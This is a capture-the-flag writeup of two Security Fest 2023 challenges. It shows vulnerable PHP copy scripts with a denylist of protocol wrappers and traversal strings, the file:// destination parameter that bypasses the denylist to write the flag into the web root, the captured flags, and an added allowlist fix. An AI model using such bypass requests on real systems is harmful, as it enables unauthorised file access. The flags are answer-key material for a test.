Security Fest 2023 Writeup

This CTF was held from 2023/5/25 19:00 (JST) to 2023/5/26 20:00 (JST).
I took part with my team again this time. We scored 141 points and placed 69th out of 275 teams.
I am writing up the challenges I solved myself.

sanity (misc)

Run the command as given in the challenge description.

$ echo '534543464553547b4261636b325468654261736963737d' | xxd -r -p
SECFEST{Back2TheBasics}
SECFEST{Back2TheBasics}

flagcopy (web)

Access http://flagcopy-1.ctf.hackaplaneten.se/copy-source.php and view the source code.

<?php

// Make sure we have the destination filename
if(!isset($_GET['dest'])) {
    header('Content-Type: text/plain');
    header('Refresh: 2;url=..'); // Cool pirates don't use Location, docs: https://web.archive.org/web/20040811213204/http://devedge.netscape.com/library/manuals/1998/htmlguide/tags3.html
    echo "error! use: ?dest=<file>";
    exit(0);
}
$dst=$_GET['dest'];

// Prevent hackspettar
$disallow = Array(

    // Bad files
    'index.php', 'copy.php', 'flag.php',

    // Prevent traversals
    '..', './', '.\\',

    // Remove known bad characters
    '?','#','&', "\0",

    // Disallow bad protocols
    'http://','https://','ftp://','zip://','rar://','expect://','phar://','zlib://','glob://','ssh2://','ogg://',

    // TODO: Improve security
);
foreach($disallow as $word) {
    if (stripos($dst,$word) !== false) {
        echo "hacker attack detected!!1!";
        exit(0);
    }
}

// Copy the flag to it's new location
var_dump(copy('flag.php',$dst));
?>

Access http://flagcopy-1.ctf.hackaplaneten.se/uploads/copy.php?dest=flag.txt to copy the flag to flag.txt.
Access http://flagcopy-1.ctf.hackaplaneten.se/uploads/flag.txt.

nope
<?php
/*
Ahoy mateys, it be me, Jack the pirate! I hear ye be lookin' for me flag copy function,
but I've got some bad news for ye. It's all a ruse! That's right, me hearties,
the only way to get yer hands on me flag copy function is to come and find me on the high seas.
And even then, ye might have a hard time convincing me to part with it!

But seriously, me hearties, ye shouldn't be messin' around with software piracy.
It's a dangerous game, and ye might end up causin' more harm than good.
So put down yer cutlasses and let's all sail the seas of software legality together. Arrrr!

Also, check out my updated copy utility at: /flag-copy-final/index.html

Ahoy,
Jack
*/
?>

Access http://flagcopy-1.ctf.hackaplaneten.se/flag-copy-final/index.html.
Access http://flagcopy-1.ctf.hackaplaneten.se/flag-copy-final/copy-source.php and view the source code.

<?php

// Make sure we have the destination filename
if(!isset($_GET['dest'])) {
    header('Content-Type: text/plain');
    header('Refresh: 2;URL=..'); // Cool pirates don't use Location, docs: https://web.archive.org/web/20040811213204/http://devedge.netscape.com/library/manuals/1998/htmlguide/tags3.html
    echo "error! use: ?dest=<file>";
    exit(0);
}
$dst=$_GET['dest'];

// Prevent hackspettar
$disallow = Array(

    // Bad files
    'index.php', 'copy.php', 'flag.php',

    // Prevent traversals
    '..', './', '.\\',

    // Remove known bad characters
    '?','#','&', "\0",

    // Disallow bad protocols
    'http://','https://','ftp://','zip://','rar://','expect://','phar://','zlib://','glob://','ssh2://','ogg://',
    
    // Woops. We only want to share PHP. Good thing we have .htaccess

    // TODO: Improve security
);
foreach($disallow as $word) {
    if (stripos($dst,$word) !== false) {
        echo "hacker attack detected!!1!";
        exit(0);
    }
}

// Copy the flag to it's new location
var_dump(copy('flag.php',$dst));
?>

Access http://flagcopy-1.ctf.hackaplaneten.se/flag-copy-final/uploads/copy.php?dest=flag.txt to copy the flag to flag.txt.
Access http://flagcopy-1.ctf.hackaplaneten.se/flag-copy-final/uploads/flag.txt, but permission is denied.
Access http://flagcopy-1.ctf.hackaplaneten.se/flag-copy-final/uploads/copy.php?dest=file:///var/www/html/flag.txt to copy the flag to /var/www/html/flag.txt.
Access http://flagcopy-1.ctf.hackaplaneten.se/flag.txt.

warmer
<?php
/*
Ahoy there, me hearties! It be Jack the pirate again, and I've got some more
wisdom to share with ye. Ye know the old sayin', "Fool me once, shame on you.
Fool me twice, shame on me"? Well, let me tell ye, it applies to software piracy too.

If ye've been caught piratin' software once, shame on the software companies for
makin' it too hard to resist. But if ye keep doin' it, ye're just askin'
for trouble. Ye might think ye're gettin' away with it, but sooner or
later, ye'll get caught. And when ye do, ye'll be wishin' ye had listened
to old Jack here.

So let me give ye some advice, me hearties. If ye want to stay out of trouble,
stick to the straight and narrow. Buy yer software from reputable sources,
and don't go messin' around with pirated copies.

Trust me, it's not worth the risk. Arrrr!

Check out my final flag copy update at: /flag-copy-final-pinky-promise-seriously/index.html
*/
?>

Access http://flagcopy-1.ctf.hackaplaneten.se/flag-copy-final-pinky-promise-seriously/index.html.
Access http://flagcopy-1.ctf.hackaplaneten.se/flag-copy-final-pinky-promise-seriously/copy-source.php and view the source code.

<?php

// Make sure we have the destination filename
if(!isset($_GET['dest'])) {
    header('Content-Type: text/plain');
    header('Refresh: 2;url=..'); // Cool pirates don't use Location, docs: https://web.archive.org/web/20040811213204/http://devedge.netscape.com/library/manuals/1998/htmlguide/tags3.html
    echo "error! use: ?dest=<file>";
    exit(0);
}
$dst=$_GET['dest'];

// Prevent hackspettar
$disallow = Array(

    // Bad files
    'index.php', 'copy.php', 'flag.php',

    // Prevent traversals
    '..', './', '.\\',

    // Remove known bad characters
    '?','#','&', "\0",

    // Disallow bad protocols
    'http://','https://','ftp://','zip://','rar://','expect://','phar://','zlib://','glob://','ssh2://','ogg://',

    // Woops. We only want to share PHP. Good thing we have .htaccess

    // Disallow pesky hackers
    'filter/',
);
foreach($disallow as $word) {
    if (stripos($dst,$word) !== false) {
        echo "hacker attack detected!!1!";
        exit(0);
    }
}

// Copy the flag to it's new location
var_dump(copy('flag.php',$dst));
?>

Access http://flagcopy-1.ctf.hackaplaneten.se/flag-copy-final-pinky-promise-seriously/uploads/copy.php?dest=file:///var/www/html/flag.txt to copy the flag to /var/www/html/flag.txt.
Access http://flagcopy-1.ctf.hackaplaneten.se/flag.txt.

you are so close
<?php
// SECFEST{@nt1p1ratByr0n_w0ulD_b3_pr0uD}
?>
SECFEST{@nt1p1ratByr0n_w0ulD_b3_pr0uD}
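
Why the file:// destination got through, and what a fix looks like (an added example, not part of the challenge or the original writeup): the denylist from the last copy-source.php is wrapped in a function and compared with an allowlist check on the two dest values used above. The names denylist_allows, safe_dest and $uploadDir are hypothetical, and the temp directory stands in for the uploads directory.

```php
<?php
// Added example; not the challenge's code. Function names are hypothetical.

// The denylist check from the final copy-source.php, wrapped as a function.
function denylist_allows(string $dst): bool {
    $disallow = ['index.php', 'copy.php', 'flag.php', '..', './', '.\\',
        '?', '#', '&', "\0", 'http://', 'https://', 'ftp://', 'zip://',
        'rar://', 'expect://', 'phar://', 'zlib://', 'glob://', 'ssh2://',
        'ogg://', 'filter/'];
    foreach ($disallow as $word) {
        if (stripos($dst, $word) !== false) {
            return false;
        }
    }
    return true;
}

// Allowlist: accept only a bare file name of a known shape and build the
// full path server-side, so no scheme, separator or absolute path survives.
function safe_dest(string $dst, string $uploadDir): ?string {
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\.txt\z/', $dst) !== 1) {
        return null;
    }
    $base = realpath($uploadDir);
    if ($base === false || !is_dir($base)) {
        return null;
    }
    return $base . DIRECTORY_SEPARATOR . $dst;
}

// Constructed inputs: the two dest values used in the writeup.
$uploadDir = sys_get_temp_dir();   // stand-in for the uploads directory
$inputs = ['flag.txt', 'file:///var/www/html/flag.txt'];
foreach ($inputs as $dst) {
    printf("%-32s denylist=%-5s allowlist=%s\n", $dst,
        denylist_allows($dst) ? 'pass' : 'block',
        safe_dest($dst, $uploadDir) ?? 'rejected');
}
```

Both values pass the denylist because neither file:// nor an absolute path is on it; the allowlist keeps only flag.txt, so the write stays inside the directory that .htaccess protects.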